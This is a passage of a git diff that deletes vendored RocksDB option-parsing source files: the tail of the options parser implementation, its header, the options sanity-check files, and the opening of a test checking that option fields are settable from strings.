-          line_num, std::string(
-                        "Does not find a matched column family name in "
-                        "TableOptions section.  Column Family Name:") +
-                        section_arg);
-    }
-  } else if (section == kOptionSectionVersion) {
-    if (has_version_section_) {
-      return InvalidArgument(
-          line_num,
-          "More than one Version section found in the option config file.");
-    }
-    has_version_section_ = true;
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::ParseVersionNumber(const std::string& ver_name,
-                                                const std::string& ver_string,
-                                                const int max_count,
-                                                int* version) {
-  int version_index = 0;
-  int current_number = 0;
-  int current_digit_count = 0;
-  bool has_dot = false;
-  for (int i = 0; i < max_count; ++i) {
-    version[i] = 0;
-  }
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-  for (size_t i = 0; i < ver_string.size(); ++i) {
-    if (ver_string[i] == '.') {
-      if (version_index >= max_count - 1) {
-        snprintf(buffer, sizeof(buffer) - 1,
-                 "A valid %s can only contains at most %d dots.",
-                 ver_name.c_str(), max_count - 1);
-        return Status::InvalidArgument(buffer);
-      }
-      if (current_digit_count == 0) {
-        snprintf(buffer, sizeof(buffer) - 1,
-                 "A valid %s must have at least one digit before each dot.",
-                 ver_name.c_str());
-        return Status::InvalidArgument(buffer);
-      }
-      version[version_index++] = current_number;
-      current_number = 0;
-      current_digit_count = 0;
-      has_dot = true;
-    } else if (isdigit(ver_string[i])) {
-      current_number = current_number * 10 + (ver_string[i] - '0');
-      current_digit_count++;
-    } else {
-      snprintf(buffer, sizeof(buffer) - 1,
-               "A valid %s can only contains dots and numbers.",
-               ver_name.c_str());
-      return Status::InvalidArgument(buffer);
-    }
-  }
-  version[version_index] = current_number;
-  if (has_dot && current_digit_count == 0) {
-    snprintf(buffer, sizeof(buffer) - 1,
-             "A valid %s must have at least one digit after each dot.",
-             ver_name.c_str());
-    return Status::InvalidArgument(buffer);
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::EndSection(
-    const OptionSection section, const std::string& section_title,
-    const std::string& section_arg,
-    const std::unordered_map<std::string, std::string>& opt_map,
-    bool ignore_unknown_options) {
-  Status s;
-  if (section == kOptionSectionDBOptions) {
-    s = GetDBOptionsFromMap(DBOptions(), opt_map, &db_opt_, true,
-                            ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    db_opt_map_ = opt_map;
-  } else if (section == kOptionSectionCFOptions) {
-    // This condition should be ensured earlier in ParseSection
-    // so we make an assertion here.
-    assert(GetCFOptions(section_arg) == nullptr);
-    cf_names_.emplace_back(section_arg);
-    cf_opts_.emplace_back();
-    s = GetColumnFamilyOptionsFromMap(ColumnFamilyOptions(), opt_map,
-                                      &cf_opts_.back(), true,
-                                      ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    // keep the parsed string.
-    cf_opt_maps_.emplace_back(opt_map);
-  } else if (section == kOptionSectionTableOptions) {
-    assert(GetCFOptions(section_arg) != nullptr);
-    auto* cf_opt = GetCFOptionsImpl(section_arg);
-    if (cf_opt == nullptr) {
-      return Status::InvalidArgument(
-          "The specified column family must be defined before the "
-          "TableOptions section:",
-          section_arg);
-    }
-    // Ignore error as table factory deserialization is optional
-    s = GetTableFactoryFromMap(
-        section_title.substr(
-            opt_section_titles[kOptionSectionTableOptions].size()),
-        opt_map, &(cf_opt->table_factory), ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-  } else if (section == kOptionSectionVersion) {
-    for (const auto pair : opt_map) {
-      if (pair.first == "rocksdb_version") {
-        s = ParseVersionNumber(pair.first, pair.second, 3, db_version);
-        if (!s.ok()) {
-          return s;
-        }
-      } else if (pair.first == "options_file_version") {
-        s = ParseVersionNumber(pair.first, pair.second, 2, opt_file_version);
-        if (!s.ok()) {
-          return s;
-        }
-        if (opt_file_version[0] < 1) {
-          return Status::InvalidArgument(
-              "A valid options_file_version must be at least 1.");
-        }
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::ValidityCheck() {
-  if (!has_db_options_) {
-    return Status::Corruption(
-        "A RocksDB Option file must have a single DBOptions section");
-  }
-  if (!has_default_cf_options_) {
-    return Status::Corruption(
-        "A RocksDB Option file must have a single CFOptions:default section");
-  }
-
-  return Status::OK();
-}
-
-std::string RocksDBOptionsParser::TrimAndRemoveComment(const std::string& line,
-                                                       bool trim_only) {
-  size_t start = 0;
-  size_t end = line.size();
-
-  // we only support "#" style comment
-  if (!trim_only) {
-    size_t search_pos = 0;
-    while (search_pos < line.size()) {
-      size_t comment_pos = line.find('#', search_pos);
-      if (comment_pos == std::string::npos) {
-        break;
-      }
-      if (comment_pos == 0 || line[comment_pos - 1] != '\\') {
-        end = comment_pos;
-        break;
-      }
-      search_pos = comment_pos + 1;
-    }
-  }
-
-  while (start < end && isspace(line[start]) != 0) {
-    ++start;
-  }
-
-  // start < end implies end > 0.
-  while (start < end && isspace(line[end - 1]) != 0) {
-    --end;
-  }
-
-  if (start < end) {
-    return line.substr(start, end - start);
-  }
-
-  return "";
-}
-
-namespace {
-bool AreEqualDoubles(const double a, const double b) {
-  return (fabs(a - b) < 0.00001);
-}
-}  // namespace
-
-bool AreEqualOptions(
-    const char* opt1, const char* opt2, const OptionTypeInfo& type_info,
-    const std::string& opt_name,
-    const std::unordered_map<std::string, std::string>* opt_map) {
-  const char* offset1 = opt1 + type_info.offset;
-  const char* offset2 = opt2 + type_info.offset;
-
-  switch (type_info.type) {
-    case OptionType::kBoolean:
-      return (*reinterpret_cast<const bool*>(offset1) ==
-              *reinterpret_cast<const bool*>(offset2));
-    case OptionType::kInt:
-      return (*reinterpret_cast<const int*>(offset1) ==
-              *reinterpret_cast<const int*>(offset2));
-    case OptionType::kVectorInt:
-      return (*reinterpret_cast<const std::vector<int>*>(offset1) ==
-              *reinterpret_cast<const std::vector<int>*>(offset2));
-    case OptionType::kUInt:
-      return (*reinterpret_cast<const unsigned int*>(offset1) ==
-              *reinterpret_cast<const unsigned int*>(offset2));
-    case OptionType::kUInt32T:
-      return (*reinterpret_cast<const uint32_t*>(offset1) ==
-              *reinterpret_cast<const uint32_t*>(offset2));
-    case OptionType::kUInt64T:
-      {
-        uint64_t v1, v2;
-        GetUnaligned(reinterpret_cast<const uint64_t*>(offset1), &v1);
-        GetUnaligned(reinterpret_cast<const uint64_t*>(offset2), &v2);
-        return (v1 == v2);
-      }
-    case OptionType::kSizeT:
-      {
-        size_t v1, v2;
-        GetUnaligned(reinterpret_cast<const size_t*>(offset1), &v1);
-        GetUnaligned(reinterpret_cast<const size_t*>(offset2), &v2);
-        return (v1 == v2);
-      }
-    case OptionType::kString:
-      return (*reinterpret_cast<const std::string*>(offset1) ==
-              *reinterpret_cast<const std::string*>(offset2));
-    case OptionType::kDouble:
-      return AreEqualDoubles(*reinterpret_cast<const double*>(offset1),
-                             *reinterpret_cast<const double*>(offset2));
-    case OptionType::kCompactionStyle:
-      return (*reinterpret_cast<const CompactionStyle*>(offset1) ==
-              *reinterpret_cast<const CompactionStyle*>(offset2));
-    case OptionType::kCompactionPri:
-      return (*reinterpret_cast<const CompactionPri*>(offset1) ==
-              *reinterpret_cast<const CompactionPri*>(offset2));
-    case OptionType::kCompressionType:
-      return (*reinterpret_cast<const CompressionType*>(offset1) ==
-              *reinterpret_cast<const CompressionType*>(offset2));
-    case OptionType::kVectorCompressionType: {
-      const auto* vec1 =
-          reinterpret_cast<const std::vector<CompressionType>*>(offset1);
-      const auto* vec2 =
-          reinterpret_cast<const std::vector<CompressionType>*>(offset2);
-      return (*vec1 == *vec2);
-    }
-    case OptionType::kChecksumType:
-      return (*reinterpret_cast<const ChecksumType*>(offset1) ==
-              *reinterpret_cast<const ChecksumType*>(offset2));
-    case OptionType::kBlockBasedTableIndexType:
-      return (
-          *reinterpret_cast<const BlockBasedTableOptions::IndexType*>(
-              offset1) ==
-          *reinterpret_cast<const BlockBasedTableOptions::IndexType*>(offset2));
-    case OptionType::kWALRecoveryMode:
-      return (*reinterpret_cast<const WALRecoveryMode*>(offset1) ==
-              *reinterpret_cast<const WALRecoveryMode*>(offset2));
-    case OptionType::kAccessHint:
-      return (*reinterpret_cast<const DBOptions::AccessHint*>(offset1) ==
-              *reinterpret_cast<const DBOptions::AccessHint*>(offset2));
-    case OptionType::kInfoLogLevel:
-      return (*reinterpret_cast<const InfoLogLevel*>(offset1) ==
-              *reinterpret_cast<const InfoLogLevel*>(offset2));
-    default:
-      if (type_info.verification == OptionVerificationType::kByName ||
-          type_info.verification == OptionVerificationType::kByNameAllowNull) {
-        std::string value1;
-        bool result =
-            SerializeSingleOptionHelper(offset1, type_info.type, &value1);
-        if (result == false) {
-          return false;
-        }
-        if (opt_map == nullptr) {
-          return true;
-        }
-        auto iter = opt_map->find(opt_name);
-        if (iter == opt_map->end()) {
-          return true;
-        } else {
-          if (type_info.verification ==
-              OptionVerificationType::kByNameAllowNull) {
-            if (iter->second == kNullptrString || value1 == kNullptrString) {
-              return true;
-            }
-          }
-          return (value1 == iter->second);
-        }
-      }
-      return false;
-  }
-}
-
-Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-    const DBOptions& db_opt, const std::vector<std::string>& cf_names,
-    const std::vector<ColumnFamilyOptions>& cf_opts,
-    const std::string& file_name, Env* env,
-    OptionsSanityCheckLevel sanity_check_level, bool ignore_unknown_options) {
-  RocksDBOptionsParser parser;
-  std::unique_ptr<SequentialFile> seq_file;
-  Status s = parser.Parse(file_name, env, ignore_unknown_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Verify DBOptions
-  s = VerifyDBOptions(db_opt, *parser.db_opt(), parser.db_opt_map(),
-                      sanity_check_level);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Verify ColumnFamily Name
-  if (cf_names.size() != parser.cf_names()->size()) {
-    if (sanity_check_level >= kSanityLevelLooselyCompatible) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionParser Error] The persisted options does not have "
-          "the same number of column family names as the db instance.");
-    } else if (cf_opts.size() > parser.cf_opts()->size()) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionsParser Error]",
-          "The persisted options file has less number of column family "
-          "names than that of the specified one.");
-    }
-  }
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    if (cf_names[i] != parser.cf_names()->at(i)) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionParser Error] The persisted options and the db"
-          "instance does not have the same name for column family ",
-          ToString(i));
-    }
-  }
-
-  // Verify Column Family Options
-  if (cf_opts.size() != parser.cf_opts()->size()) {
-    if (sanity_check_level >= kSanityLevelLooselyCompatible) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionsParser Error]",
-          "The persisted options does not have the same number of "
-          "column families as the db instance.");
-    } else if (cf_opts.size() > parser.cf_opts()->size()) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionsParser Error]",
-          "The persisted options file has less number of column families "
-          "than that of the specified number.");
-    }
-  }
-  for (size_t i = 0; i < cf_opts.size(); ++i) {
-    s = VerifyCFOptions(cf_opts[i], parser.cf_opts()->at(i),
-                        &(parser.cf_opt_maps()->at(i)), sanity_check_level);
-    if (!s.ok()) {
-      return s;
-    }
-    s = VerifyTableFactory(cf_opts[i].table_factory.get(),
-                           parser.cf_opts()->at(i).table_factory.get(),
-                           sanity_check_level);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::VerifyDBOptions(
-    const DBOptions& base_opt, const DBOptions& persisted_opt,
-    const std::unordered_map<std::string, std::string>* opt_map,
-    OptionsSanityCheckLevel sanity_check_level) {
-  for (auto pair : db_options_type_info) {
-    if (pair.second.verification == OptionVerificationType::kDeprecated) {
-      // We skip checking deprecated variables as they might
-      // contain random values since they might not be initialized
-      continue;
-    }
-    if (DBOptionSanityCheckLevel(pair.first) <= sanity_check_level) {
-      if (!AreEqualOptions(reinterpret_cast<const char*>(&base_opt),
-                           reinterpret_cast<const char*>(&persisted_opt),
-                           pair.second, pair.first, nullptr)) {
-        const size_t kBufferSize = 2048;
-        char buffer[kBufferSize];
-        std::string base_value;
-        std::string persisted_value;
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&base_opt) + pair.second.offset,
-            pair.second.type, &base_value);
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&persisted_opt) + pair.second.offset,
-            pair.second.type, &persisted_value);
-        snprintf(buffer, sizeof(buffer),
-                 "[RocksDBOptionsParser]: "
-                 "failed the verification on DBOptions::%s --- "
-                 "The specified one is %s while the persisted one is %s.\n",
-                 pair.first.c_str(), base_value.c_str(),
-                 persisted_value.c_str());
-        return Status::InvalidArgument(Slice(buffer, strlen(buffer)));
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::VerifyCFOptions(
-    const ColumnFamilyOptions& base_opt,
-    const ColumnFamilyOptions& persisted_opt,
-    const std::unordered_map<std::string, std::string>* persisted_opt_map,
-    OptionsSanityCheckLevel sanity_check_level) {
-  for (auto& pair : cf_options_type_info) {
-    if (pair.second.verification == OptionVerificationType::kDeprecated) {
-      // We skip checking deprecated variables as they might
-      // contain random values since they might not be initialized
-      continue;
-    }
-    if (CFOptionSanityCheckLevel(pair.first) <= sanity_check_level) {
-      if (!AreEqualOptions(reinterpret_cast<const char*>(&base_opt),
-                           reinterpret_cast<const char*>(&persisted_opt),
-                           pair.second, pair.first, persisted_opt_map)) {
-        const size_t kBufferSize = 2048;
-        char buffer[kBufferSize];
-        std::string base_value;
-        std::string persisted_value;
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&base_opt) + pair.second.offset,
-            pair.second.type, &base_value);
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&persisted_opt) + pair.second.offset,
-            pair.second.type, &persisted_value);
-        snprintf(buffer, sizeof(buffer),
-                 "[RocksDBOptionsParser]: "
-                 "failed the verification on ColumnFamilyOptions::%s --- "
-                 "The specified one is %s while the persisted one is %s.\n",
-                 pair.first.c_str(), base_value.c_str(),
-                 persisted_value.c_str());
-        return Status::InvalidArgument(Slice(buffer, sizeof(buffer)));
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::VerifyTableFactory(
-    const TableFactory* base_tf, const TableFactory* file_tf,
-    OptionsSanityCheckLevel sanity_check_level) {
-  if (base_tf && file_tf) {
-    if (sanity_check_level > kSanityLevelNone &&
-        std::string(base_tf->Name()) != std::string(file_tf->Name())) {
-      return Status::Corruption(
-          "[RocksDBOptionsParser]: "
-          "failed the verification on TableFactory->Name()");
-    }
-    if (base_tf->Name() == BlockBasedTableFactory::kName) {
-      return VerifyBlockBasedTableFactory(
-          static_cast_with_check<const BlockBasedTableFactory,
-                                 const TableFactory>(base_tf),
-          static_cast_with_check<const BlockBasedTableFactory,
-                                 const TableFactory>(file_tf),
-          sanity_check_level);
-    }
-    // TODO(yhchiang): add checks for other table factory types
-  } else {
-    // TODO(yhchiang): further support sanity check here
-  }
-  return Status::OK();
-}
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/options/options_parser.h b/thirdparty/rocksdb/options/options_parser.h
deleted file mode 100644
index 5545c0b..0000000
--- a/thirdparty/rocksdb/options/options_parser.h
+++ /dev/null
@@ -1,146 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "options/options_helper.h"
-#include "options/options_sanity_check.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "table/block_based_table_factory.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-#define ROCKSDB_OPTION_FILE_MAJOR 1
-#define ROCKSDB_OPTION_FILE_MINOR 1
-
-enum OptionSection : char {
-  kOptionSectionVersion = 0,
-  kOptionSectionDBOptions,
-  kOptionSectionCFOptions,
-  kOptionSectionTableOptions,
-  kOptionSectionUnknown
-};
-
-static const std::string opt_section_titles[] = {
-    "Version", "DBOptions", "CFOptions", "TableOptions/", "Unknown"};
-
-Status PersistRocksDBOptions(const DBOptions& db_opt,
-                             const std::vector<std::string>& cf_names,
-                             const std::vector<ColumnFamilyOptions>& cf_opts,
-                             const std::string& file_name, Env* env);
-
-extern bool AreEqualOptions(
-    const char* opt1, const char* opt2, const OptionTypeInfo& type_info,
-    const std::string& opt_name,
-    const std::unordered_map<std::string, std::string>* opt_map);
-
-class RocksDBOptionsParser {
- public:
-  explicit RocksDBOptionsParser();
-  ~RocksDBOptionsParser() {}
-  void Reset();
-
-  Status Parse(const std::string& file_name, Env* env,
-               bool ignore_unknown_options = false);
-  static std::string TrimAndRemoveComment(const std::string& line,
-                                          const bool trim_only = false);
-
-  const DBOptions* db_opt() const { return &db_opt_; }
-  const std::unordered_map<std::string, std::string>* db_opt_map() const {
-    return &db_opt_map_;
-  }
-  const std::vector<ColumnFamilyOptions>* cf_opts() const { return &cf_opts_; }
-  const std::vector<std::string>* cf_names() const { return &cf_names_; }
-  const std::vector<std::unordered_map<std::string, std::string>>* cf_opt_maps()
-      const {
-    return &cf_opt_maps_;
-  }
-
-  const ColumnFamilyOptions* GetCFOptions(const std::string& name) {
-    return GetCFOptionsImpl(name);
-  }
-  size_t NumColumnFamilies() { return cf_opts_.size(); }
-
-  static Status VerifyRocksDBOptionsFromFile(
-      const DBOptions& db_opt, const std::vector<std::string>& cf_names,
-      const std::vector<ColumnFamilyOptions>& cf_opts,
-      const std::string& file_name, Env* env,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch,
-      bool ignore_unknown_options = false);
-
-  static Status VerifyDBOptions(
-      const DBOptions& base_opt, const DBOptions& new_opt,
-      const std::unordered_map<std::string, std::string>* new_opt_map = nullptr,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch);
-
-  static Status VerifyCFOptions(
-      const ColumnFamilyOptions& base_opt, const ColumnFamilyOptions& new_opt,
-      const std::unordered_map<std::string, std::string>* new_opt_map = nullptr,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch);
-
-  static Status VerifyTableFactory(
-      const TableFactory* base_tf, const TableFactory* file_tf,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch);
-
-  static Status ExtraParserCheck(const RocksDBOptionsParser& input_parser);
-
- protected:
-  bool IsSection(const std::string& line);
-  Status ParseSection(OptionSection* section, std::string* title,
-                      std::string* argument, const std::string& line,
-                      const int line_num);
-
-  Status CheckSection(const OptionSection section,
-                      const std::string& section_arg, const int line_num);
-
-  Status ParseStatement(std::string* name, std::string* value,
-                        const std::string& line, const int line_num);
-
-  Status EndSection(const OptionSection section, const std::string& title,
-                    const std::string& section_arg,
-                    const std::unordered_map<std::string, std::string>& opt_map,
-                    bool ignore_unknown_options);
-
-  Status ValidityCheck();
-
-  Status InvalidArgument(const int line_num, const std::string& message);
-
-  Status ParseVersionNumber(const std::string& ver_name,
-                            const std::string& ver_string, const int max_count,
-                            int* version);
-
-  ColumnFamilyOptions* GetCFOptionsImpl(const std::string& name) {
-    assert(cf_names_.size() == cf_opts_.size());
-    for (size_t i = 0; i < cf_names_.size(); ++i) {
-      if (cf_names_[i] == name) {
-        return &cf_opts_[i];
-      }
-    }
-    return nullptr;
-  }
-
- private:
-  DBOptions db_opt_;
-  std::unordered_map<std::string, std::string> db_opt_map_;
-  std::vector<std::string> cf_names_;
-  std::vector<ColumnFamilyOptions> cf_opts_;
-  std::vector<std::unordered_map<std::string, std::string>> cf_opt_maps_;
-  bool has_version_section_;
-  bool has_db_options_;
-  bool has_default_cf_options_;
-  int db_version[3];
-  int opt_file_version[3];
-};
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_sanity_check.cc b/thirdparty/rocksdb/options/options_sanity_check.cc
deleted file mode 100644
index d3afcc0..0000000
--- a/thirdparty/rocksdb/options/options_sanity_check.cc
+++ /dev/null
@@ -1,38 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "options/options_sanity_check.h"
-
-namespace rocksdb {
-
-namespace {
-OptionsSanityCheckLevel SanityCheckLevelHelper(
-    const std::unordered_map<std::string, OptionsSanityCheckLevel>& smap,
-    const std::string& name) {
-  auto iter = smap.find(name);
-  return iter != smap.end() ? iter->second : kSanityLevelExactMatch;
-}
-}
-
-OptionsSanityCheckLevel DBOptionSanityCheckLevel(
-    const std::string& option_name) {
-  return SanityCheckLevelHelper(sanity_level_db_options, option_name);
-}
-
-OptionsSanityCheckLevel CFOptionSanityCheckLevel(
-    const std::string& option_name) {
-  return SanityCheckLevelHelper(sanity_level_cf_options, option_name);
-}
-
-OptionsSanityCheckLevel BBTOptionSanityCheckLevel(
-    const std::string& option_name) {
-  return SanityCheckLevelHelper(sanity_level_bbt_options, option_name);
-}
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/options/options_sanity_check.h b/thirdparty/rocksdb/options/options_sanity_check.h
deleted file mode 100644
index 118fdd2..0000000
--- a/thirdparty/rocksdb/options/options_sanity_check.h
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <unordered_map>
-
-#ifndef ROCKSDB_LITE
-namespace rocksdb {
-// This enum defines the RocksDB options sanity level.
-enum OptionsSanityCheckLevel : unsigned char {
-  // Performs no sanity check at all.
-  kSanityLevelNone = 0x00,
-  // Performs minimum check to ensure the RocksDB instance can be
-  // opened without corrupting / mis-interpreting the data.
-  kSanityLevelLooselyCompatible = 0x01,
-  // Perform exact match sanity check.
-  kSanityLevelExactMatch = 0xFF,
-};
-
-// The sanity check level for DB options
-static const std::unordered_map<std::string, OptionsSanityCheckLevel>
-    sanity_level_db_options {};
-
-// The sanity check level for column-family options
-static const std::unordered_map<std::string, OptionsSanityCheckLevel>
-    sanity_level_cf_options = {
-        {"comparator", kSanityLevelLooselyCompatible},
-        {"table_factory", kSanityLevelLooselyCompatible},
-        {"merge_operator", kSanityLevelLooselyCompatible}};
-
-// The sanity check level for block-based table options
-static const std::unordered_map<std::string, OptionsSanityCheckLevel>
-    sanity_level_bbt_options {};
-
-OptionsSanityCheckLevel DBOptionSanityCheckLevel(
-    const std::string& options_name);
-OptionsSanityCheckLevel CFOptionSanityCheckLevel(
-    const std::string& options_name);
-OptionsSanityCheckLevel BBTOptionSanityCheckLevel(
-    const std::string& options_name);
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/options/options_settable_test.cc b/thirdparty/rocksdb/options/options_settable_test.cc
deleted file mode 100644
index ab9989f..0000000
--- a/thirdparty/rocksdb/options/options_settable_test.cc
+++ /dev/null
@@ -1,454 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <cstring>
-
-#include "options/options_parser.h"
-#include "rocksdb/convenience.h"
-#include "util/testharness.h"
-
-#ifndef GFLAGS
-bool FLAGS_enable_print = false;
-#else
-#include <gflags/gflags.h>
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-#endif  // GFLAGS
-
-namespace rocksdb {
-
-// Verify options are settable from options strings.
-// We take the approach that depends on compiler behavior that copy constructor
-// won't touch implicit padding bytes, so that the test is fragile.
-// As a result, we only run the tests to verify new fields in options are
-// settable through string on limited platforms as it depends on behavior of
-// compilers.
-#ifndef ROCKSDB_LITE
-#if defined OS_LINUX || defined OS_WIN
-#ifndef __clang__
-
-class OptionsSettableTest : public testing::Test {
- public:
-  OptionsSettableTest() {}
-};
-
-const char kSpecialChar = 'z';
-typedef std::vector<std::pair<size_t, size_t>> OffsetGap;
-
-void FillWithSpecialChar(char* start_ptr, size_t total_size,
-                         const OffsetGap& blacklist) {
-  size_t offset = 0;
-  for (auto& pair : blacklist) {
-    std::memset(start_ptr + offset, kSpecialChar, pair.first - offset);
-    offset = pair.first + pair.second;
-  }
-  std::memset(start_ptr + offset, kSpecialChar, total_size - offset);
-}
-
-int NumUnsetBytes(char* start_ptr, size_t total_size,
-                  const OffsetGap& blacklist) {
-  int total_unset_bytes_base = 0;
-  size_t offset = 0;
-  for (auto& pair : blacklist) {
-    for (char* ptr = start_ptr + offset; ptr < start_ptr + pair.first; ptr++) {
-      if (*ptr == kSpecialChar) {
-        total_unset_bytes_base++;
-      }
-    }
-    offset = pair.first + pair.second;
-  }
-  for (char* ptr = start_ptr + offset; ptr < start_ptr + total_size; ptr++) {
-    if (*ptr == kSpecialChar) {
-      total_unset_bytes_base++;
-    }
-  }
-  return total_unset_bytes_base;
-}
-
-// If the test fails, likely a new option is added to BlockBasedTableOptions
-// but it cannot be set through GetBlockBasedTableOptionsFromString(), or the
-// test is not updated accordingly.
-// After adding an option, we need to make sure it is settable by
-// GetBlockBasedTableOptionsFromString() and add the option to the input string
-// passed to the GetBlockBasedTableOptionsFromString() in this test.
-// If it is a complicated type, you also need to add the field to
-// kBbtoBlacklist, and maybe add customized verification for it.
-TEST_F(OptionsSettableTest, BlockBasedTableOptionsAllFieldsSettable) {
-  // Items in the form of <offset, size>. Need to be in ascending order
-  // and not overlapping. Need to updated if new pointer-option is added.
-  const OffsetGap kBbtoBlacklist = {
-      {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory),
-       sizeof(std::shared_ptr<FlushBlockPolicyFactory>)},
-      {offsetof(struct BlockBasedTableOptions, block_cache),
-       sizeof(std::shared_ptr<Cache>)},
-      {offsetof(struct BlockBasedTableOptions, persistent_cache),
-       sizeof(std::shared_ptr<PersistentCache>)},
-      {offsetof(struct BlockBasedTableOptions, block_cache_compressed),
-       sizeof(std::shared_ptr<Cache>)},
-      {offsetof(struct BlockBasedTableOptions, filter_policy),
-       sizeof(std::shared_ptr<const FilterPolicy>)},
-  };
-
-  // In this test, we catch a new option of BlockBasedTableOptions that is not
-  // settable through GetBlockBasedTableOptionsFromString().
-  // We count padding bytes of the option struct, and assert it to be the same
-  // as unset bytes of an option struct initialized by
-  // GetBlockBasedTableOptionsFromString().
-
-  char* bbto_ptr = new char[sizeof(BlockBasedTableOptions)];
-
-  // Count padding bytes by setting all bytes in the memory to a special char,
-  // copy a well constructed struct to this memory and see how many special
-  // bytes left.
-  BlockBasedTableOptions* bbto = new (bbto_ptr) BlockBasedTableOptions();
-  FillWithSpecialChar(bbto_ptr, sizeof(BlockBasedTableOptions), kBbtoBlacklist);
-  // It based on the behavior of compiler that padding bytes are not changed
-  // when copying the struct. It's prone to failure when compiler behavior
-  // changes. We verify there is unset bytes to detect the case.
-  *bbto = BlockBasedTableOptions();
-  int unset_bytes_base =
-      NumUnsetBytes(bbto_ptr, sizeof(BlockBasedTableOptions), kBbtoBlacklist);
-  ASSERT_GT(unset_bytes_base, 0);
-  bbto->~BlockBasedTableOptions();
-
-  // Construct the base option passed into
-  // GetBlockBasedTableOptionsFromString().
-  bbto = new (bbto_ptr) BlockBasedTableOptions();
-  FillWithSpecialChar(bbto_ptr, sizeof(BlockBasedTableOptions), kBbtoBlacklist);
-  // This option is not setable:
-  bbto->use_delta_encoding = true;
-
-  char* new_bbto_ptr = new char[sizeof(BlockBasedTableOptions)];
-  BlockBasedTableOptions* new_bbto =
-      new (new_bbto_ptr) BlockBasedTableOptions();
-  FillWithSpecialChar(new_bbto_ptr, sizeof(BlockBasedTableOptions),
-                      kBbtoBlacklist);
-
-  // Need to update the option string if a new option is added.
-  ASSERT_OK(GetBlockBasedTableOptionsFromString(
-      *bbto,
-      "cache_index_and_filter_blocks=1;"
-      "cache_index_and_filter_blocks_with_high_priority=true;"
-      "pin_l0_filter_and_index_blocks_in_cache=1;"
-      "index_type=kHashSearch;"
-      "checksum=kxxHash;hash_index_allow_collision=1;no_block_cache=1;"
-      "block_cache=1M;block_cache_compressed=1k;block_size=1024;"
-      "block_size_deviation=8;block_restart_interval=4; "
-      "metadata_block_size=1024;"
-      "partition_filters=false;"
-      "index_block_restart_interval=4;"
-      "filter_policy=bloomfilter:4:true;whole_key_filtering=1;"
-      "format_version=1;"
-      "hash_index_allow_collision=false;"
-      "verify_compression=true;read_amp_bytes_per_bit=0",
-      new_bbto));
-
-  ASSERT_EQ(unset_bytes_base,
-            NumUnsetBytes(new_bbto_ptr, sizeof(BlockBasedTableOptions),
-                          kBbtoBlacklist));
-
-  ASSERT_TRUE(new_bbto->block_cache.get() != nullptr);
-  ASSERT_TRUE(new_bbto->block_cache_compressed.get() != nullptr);
-  ASSERT_TRUE(new_bbto->filter_policy.get() != nullptr);
-
-  bbto->~BlockBasedTableOptions();
-  new_bbto->~BlockBasedTableOptions();
-
-  delete[] bbto_ptr;
-  delete[] new_bbto_ptr;
-}
-
-// If the test fails, likely a new option is added to DBOptions
